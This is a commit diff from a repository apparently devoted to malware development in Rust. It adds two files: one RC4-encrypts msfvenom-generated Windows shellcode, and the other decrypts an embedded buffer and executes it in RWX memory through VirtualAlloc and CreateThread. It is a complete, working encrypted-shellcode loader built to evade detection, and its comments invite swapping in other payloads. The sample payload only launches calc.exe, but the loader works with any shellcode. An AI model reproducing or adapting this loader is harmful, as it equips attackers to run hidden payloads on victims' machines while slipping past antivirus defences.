rc4 encrypt methods

Author: Whitecat18

Encryption Methods/Rc4EncodeShellcode.rs

@@ -0,0 +1,78 @@
+/*
+    Rc4 Shellcode Encryption
+    For More Codes: https://github.com/Whitecat18/Rust-for-Malware-Development.git
+    @5mukx
+*/
+
+// Reference [WIkiPedia] : https://en.wikipedia.org/wiki/RC4
+struct Rc4{
+    s: [u8; 256],
+    i: usize,
+    j: usize,
+}
+
+impl Rc4 {
+    fn new(key: &[u8]) -> Rc4{
+        let mut s = [0u8; 256];
+        for i in 0..256{
+            s[i] = i as u8;
+        }
+        
+        // Key Scheduling Algorithm (KSA): Permutation 
+        let mut j = 0;
+        for i in 0..256{
+            j = (j + s[i] as usize + key[i % key.len()] as usize) % 256;
+            s.swap(i, j);
+        }
+        Rc4{s,i:0,j:0}
+    }
+
+    // Pseudo-random Generation Algorithm (PRGA): Generation of Keystream
+    fn apply_keystream(&mut self, data: &mut [u8]){
+        for byte in data.iter_mut() {
+            self.i = (self.i + 1) % 256;
+            self.j = (self.j + self.s[self.i] as usize) % 256;
+            self.s.swap(self.i, self.j);
+            let t = (self.s[self.i] as usize + self.s[self.j] as usize) % 256;
+            *byte ^= self.s[t];
+        }
+    }
+}
+
+fn main(){
+    let key = b"This is nerdy .. im the key :)";
+    let mut rc4 = Rc4::new(key);
+
+    // repalce your shellcode 
+    // msfvenom -p windows/x64/exec CMD=calc.exe -f rust
+    let mut shellcode: [u8; 276] = [0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,
+    0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,
+    0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,
+    0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,
+    0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,
+    0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,
+    0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,
+    0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,
+    0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,
+    0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,
+    0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,
+    0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,
+    0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,
+    0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,
+    0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,
+    0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,
+    0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,
+    0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,
+    0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,
+    0x8b,0x6f,0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,
+    0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,
+    0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,
+    0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,
+    0x2e,0x65,0x78,0x65,0x00];
+
+
+    rc4.apply_keystream(&mut shellcode);
+
+    println!("[+] Encrypted Shellcode: {:?}",shellcode);
+}
+

Encryption Methods/rc4_shellcode_encrypt.rs

@@ -0,0 +1,88 @@
+
+/*
+    An POC of Rc4 Encryption Technique
+    For More Codes: 
+    @5mukx
+*/
+
+use rc4::{Rc4, KeyInit, StreamCipher};
+use winapi::um::{errhandlingapi::GetLastError, handleapi::CloseHandle, memoryapi::VirtualAlloc, processthreadsapi::{CreateThread, ResumeThread}};
+use std::ptr::{self, null_mut};
+use winapi::um::synchapi::WaitForSingleObject;
+
+
+macro_rules! okey {
+    ($msg:expr, $($arg:expr), *) => {
+        println!("\\_____[+] {}", format!($msg, $($arg), *));
+    };
+}
+
+macro_rules! error {
+    ($msg:expr, $($arg:expr), *) => {
+        println!("\\_____[-] {}", format!($msg, $($arg), *));
+        println!("Exiting ...");
+        std::process::exit(1);
+    };
+}
+fn main(){
+    
+    // Encrypted Shellcode here !
+    let mut buf = [142, 107, 104, 1, 240, 64, 88, 236, 94, 35, 59, 43, 23, 163, 122, 216, 40, 91, 225, 163, 
+    24, 202, 162, 245, 58, 83, 126, 124, 154, 221, 246, 138, 169, 156, 122, 229, 96, 197, 32,
+     154, 184, 228, 37, 246, 97, 159, 100, 21, 176, 235, 208, 102, 118, 149, 129, 227, 214,
+     113, 253, 12, 224, 23, 213, 164, 249, 147, 55, 113, 32, 10, 171, 55, 186, 43, 138, 206,
+     223, 211, 9, 255, 24, 173, 56, 176, 4, 136, 170, 184, 17, 174, 194, 102, 43, 40, 209, 25,
+     195, 9, 35, 255, 225, 61, 179, 248, 23, 172, 15, 75, 224, 142, 66, 206, 197, 159, 44, 132,
+     35, 245, 119, 141, 255, 101, 67, 112, 70, 198, 144, 182, 154, 228, 167, 94, 87, 156, 165,
+     219, 127, 76, 223, 204, 227, 199, 69, 231, 238, 213, 16, 250, 85, 219, 172, 51, 233, 217,
+     191, 140, 80, 204, 70, 80, 182, 70, 45, 59, 79, 154, 5, 74, 119, 200, 145, 37, 21, 44, 205,
+     55, 164, 149, 240, 250, 37, 37, 39, 78, 134, 8, 195, 216, 61, 199, 36, 1, 47, 29, 213, 168,
+     237, 192, 250, 103, 48, 145, 233, 154, 242, 90, 71, 88, 148, 163, 61, 6, 123, 28, 255, 57,
+     120, 56, 206, 208, 74, 36, 183, 190, 184, 95, 86, 76, 141, 151, 99, 59, 233, 47, 178, 249,
+     18, 115, 253, 16, 212, 200, 95, 140, 121, 211, 167, 201, 140, 96, 245, 126, 230, 54, 220,
+     38, 40, 24, 223, 42, 254, 233, 81, 16, 154, 51, 191, 205, 46, 90, 205, 172, 90, 56, 64, 11];
+
+    // key => let key = b"This is nerdy .. im the key :)";
+    let mut rc4 =  Rc4::new(b"This is nerdy .. im the key :)".into());
+    rc4.apply_keystream(&mut buf);
+
+
+    // => After this you can use you own Technique to inject the shellcode !
+    unsafe{
+        let vir_addr = VirtualAlloc(
+            null_mut(),
+            buf.len(),
+            0x1000 | 0x2000,
+            0x40,
+        );
+
+        if vir_addr.is_null(){
+            error!("VirAlloc Error, Failed to allocate mem: {}",GetLastError());
+        }
+        okey!("Allocated Address: {:?}",vir_addr);
+
+        ptr::copy(buf.as_ptr(), vir_addr as *mut u8, buf.len());
+
+        let h_thread = CreateThread(
+            null_mut(),
+            0,
+            std::mem::transmute(vir_addr),
+            null_mut(),
+            0x00000004, // CREATE_SUSPEND
+            null_mut(),
+        );
+
+        if h_thread.is_null(){
+            error!("Failed to create Thread :{:?}",GetLastError());
+        }
+
+        okey!("Execution addr: {:?}",h_thread);
+
+        ResumeThread(h_thread);
+        okey!("Executed Shellcode ...{}","!");
+
+        WaitForSingleObject(h_thread, 0xFFFFFFFF);
+        CloseHandle(h_thread);
+    }
+}
+